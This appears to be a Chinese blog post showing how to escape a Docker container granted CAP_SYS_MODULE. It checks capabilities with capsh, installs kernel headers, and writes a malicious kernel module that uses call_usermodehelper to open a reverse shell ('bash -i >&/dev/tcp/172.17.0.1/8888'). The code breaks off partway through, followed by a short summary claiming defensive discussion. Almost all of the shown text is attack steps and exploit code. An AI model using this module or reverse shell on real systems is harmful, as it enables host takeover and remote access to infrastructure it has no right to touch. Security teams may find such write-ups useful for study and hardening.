测试环境配置
docker run -it --cap-add=SYS_MODULE ubuntu:18.04
实际环境利用
cat /proc/self/status|grep Cap

然后使用capsh decode一下
capsh --decode=00000000a80525fb

发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西
apt update&&apt install -y gcc make vim linux-headers-$(uname -r) kmod
exp.c
#include <linux/module.h>
MODULE_LICENSE("GPL");
char *argv[] = {
"/bin/bash",
"-c",
"bash -i >&/dev/tcp/172.17.0.1/8888 0>&1",
NULL
};
static int __init connect_back_init(void)
{
return call_usermodehelper(
argv[0],
argv,

本文详细介绍了如何在测试环境中使用Docker配置时获取CAP_SYS_MODULE权限,进而演示如何编写并内嵌恶意模块,实现在容器中反弹shell。着重讨论了实际环境中的潜在安全威胁与防范措施。

288

被折叠的 条评论
为什么被折叠?



